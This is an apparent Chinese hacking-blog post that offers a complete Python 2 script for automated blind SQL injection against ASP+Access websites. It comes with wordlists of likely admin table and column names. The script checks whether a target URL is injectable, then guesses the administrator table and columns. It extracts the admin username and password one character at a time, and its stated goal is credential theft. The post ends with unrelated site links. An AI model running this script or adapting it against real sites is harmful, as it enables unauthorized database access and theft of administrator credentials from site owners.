Python实现ASP+ACCESS注入,不用SOCKET

不用SOCKET是因为个人感觉Python的3个HTTP协议的模块实在是功能太强了.

虽然它们的底层还是通过SOCKET实现的.

三个HTTP模块就是HTTPLIB,URLLIB,URLLIB2

呵呵

CODE

代码:

--------------------------------------------------------------------------------

#!/usr/bin/python

# ASP ACCESS SQL Injection Test

# Written by ToToDoDo (QQ:8924007) Email: osbbs@osbbs.com

from sys import exit

from urllib import urlopen

from string import join,strip

from re import search

def get_tablename():

tablefile = open("table.txt")

for line in tablefile.readlines():

line = strip(line)

sql = join(['%20and%20exists%20(select%20*%20from%20',line,')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",line

else:

print "Found the admin table name:", line,"\n"

print "Now! Start to get name column from",line,"table"

get_namecolumn(line)

print "Now! Start to get password column from",line,"table"

get_passwordcolumn(line)

break

def get_namecolumn(tablename):

namecolumn = open("namecolumn.txt")

for namecolumnline in namecolumn.readlines():

namecolumnline = strip(namecolumnline)

sql = join(['%20and%20exists%20(select%20',namecolumnline,'%20from%20',tablename,')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",namecolumnline

else:

print "Found the name column from admin table:", namecolumnline,"\n"

get_usernamelenth(tablename,namecolumnline)

break

def get_passwordcolumn(tablename):

passwordcolumn = open("passwordcolumn.txt")

for passwordcolumnline in passwordcolumn.readlines():

passwordcolumnline = strip(passwordcolumnline)

sql = join(['%20and%20exists%20(select%20',passwordcolumnline,'%20from%20',tablename,')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",passwordcolumnline

else:

print "Found the password column from admin table:", passwordcolumnline,"\n"

get_passwordlenth(tablename,passwordcolumnline)

break

def get_usernamelenth(tablename,namecolumn):

for x in range(1,51):

sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',namecolumn,')=',str(x),')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",x

else:

print "Found the lenth of the username:", x,"\n"

get_username(tablename,namecolumn,x)

break

def get_passwordlenth(tablename,passwordcolumn):

for x in range(1,51):

sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',passwordcolumn,')=',str(x),')'],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if not search(judge,htmlcodes):

print "Error:",x

else:

print "Found the lenth of the password:", x,"\n"

get_password(tablename,passwordcolumn,x)

break

def get_username(tablename,namecolumn,lenth):

list = []

for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:

list.extend(x)

global username

username = ''

for y in range(1,lenth+1):

print "Now! Crack the left ",y," of the username","Waiting~~~~~~~"

for z in list:

sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",namecolumn,",",str(y),",","1))=",str(z),")"],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if search(judge,htmlcodes):

username = join([username,chr(z)],'')

break

print "Found the username = :",username,"\n"

def get_password(tablename,passwordcolumn,lenth):

list = []

for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]:

list.extend(x)

global password

password = ''

for y in range(1,lenth+1):

print "Now! Crack the left ",y," of the password","Waiting~~~~~~~"

for z in list:

sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",passwordcolumn,",",str(y),",","1))=",str(z),")"],'')

urlfile = urlopen(url+sql)

htmlcodes = urlfile.read()

if search(judge,htmlcodes):

password = join([password,chr(z)],'')

break

print "Found the password = :",password,"\n"

print "\n########################################################################\n"

print " ASP+ACCESS SQL Injection Scripts By ToToDoDo with Python 2.3.x(QQ:8924007)"

print " Email: osbbs@msn.com\n"

print "========================================================================";

print """Usage:

C:\Python23>python asp_inject.py

Supply a URL to test inject = http://127.0.0.1/article/list.asp?id=3

Supply some string in correct page but not in error page to help this script to

judge properly.

Judge string = test\n"""

print "########################################################################\n";

url = raw_input('Supply a URL to test inject = ')

if url == '':

print "U must supply a URL with '.asp?xxx=' in"

exit(1)

judge = raw_input("\nSupply some string in correct page but not in error page to help this script to judge properly.\n\nJudge string = ")

if judge == '':

print "U must supply a string to help judge!"

exit(1)

a = '%20and%201=1'

b = '%20and%201=2'

urlfile_a = urlopen(url+a)

urlfile_b = urlopen(url+b)

htmlcodes_a = urlfile_a.read()

htmlcodes_b = urlfile_b.read()

if search(judge,htmlcodes_a) and not search(judge,htmlcodes_b):

print "\n\n\nFound injection:",url,"\n\n\nNow,start to get the table name!","\n"

get_tablename()

print "\n\n\nThe admin's account name is ",username,"\nThe admin's password is ",password

else:

print "Can't be Injected"

--------------------------------------------------------------------------------

需要3个字典文件:

table.txt:

user

userinfo

admintable

admin

article_admin

namecolumn.txt:

name

username

u_name

uname

adminname

passwordcolumn.txt

pass

adminpass

pwd

password

passwd

admin_pass

admin_password

• ·QQ尾巴病毒的Visual C++实现探讨
• ·翻译：Effective C++, 3rd E
• ·春季上班族七日完美变身计划 打扮_美丽顾问
• ·春季瘦身搭配 胖妞自信露大腿 打扮_美丽顾问
• ·体形VS牛仔裤 让身体更火辣迷人 打扮_美丽顾
• ·vi编辑器的学习使用（十五）
• ·读写ini文件（C#源码）
• ·Thinking in Java读书笔记(第七
• ·可以从冬季穿到春季的小夹克 打扮_美丽顾问
• ·MS-SQLServer2000中字符型数据自